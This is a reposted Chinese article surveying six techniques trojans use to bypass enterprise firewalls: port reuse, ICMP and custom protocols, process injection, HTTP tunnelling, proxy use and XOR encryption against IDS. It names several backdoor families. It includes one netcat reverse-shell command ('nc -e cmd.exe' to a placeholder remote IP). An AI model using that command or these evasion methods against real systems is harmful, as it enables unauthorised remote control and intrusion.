木马穿越企业防火墙的六大案例
发布时间:2021-09-04 15:49:24 所属栏目:安全 来源:互联网
导读:防护网络攻击,防火墙是网络用户必备的。木马都是因为有带着需求来的,岂能因为这筑起的防火墙就乖乖离开。 1. 首先就是No Firewall(允许本地对外监听基本上任何端口) 对付这种机器好办,随便哪个马一般都行典型代表 Radmin rdp 3389/tcp 2. 端口筛选 使用
|
防护网络攻击,防火墙是网络用户必备的。木马都是因为有带着需求来的,岂能因为这筑起的防火墙就乖乖离开。
1. 首先就是No Firewall(允许本地对外监听基本上任何端口)
对付这种机器好办,随便哪个马一般都行典型代表 Radmin
rdp 3389/tcp
2. 端口筛选
使用工具netcat就可以穿刺这种防火墙 :
nc -e cmd.exe 远程ip 远程监听port。
随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等。
典型的后门如hkdoor,ntrookit。
还有利用无端口协议来通信,如利用icmp报文(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)。
典型的如pingdoor。
更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信, 典型的如ntrootkit采用了自定义协议技术。
3.应用程序筛选。(只允许特定程序访问网络)
木马也不甘落后,自己不能访问网络,只好寄人篱下:
进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序。
现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙。典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等。
4.协议筛选
http-tunnel (http隧道)将木马通信封装成http数据报进行传输。
使用这种技术的有pcshare(使用双向http隧道传输)
5.IP过滤
一般就是化分为本机,局域网,广域网三个层次,比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!
可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了。
6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性。典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密。
但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用。
同时,综合利用以上对抗技术的木马也不鲜见了。
 (编辑:阳江站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
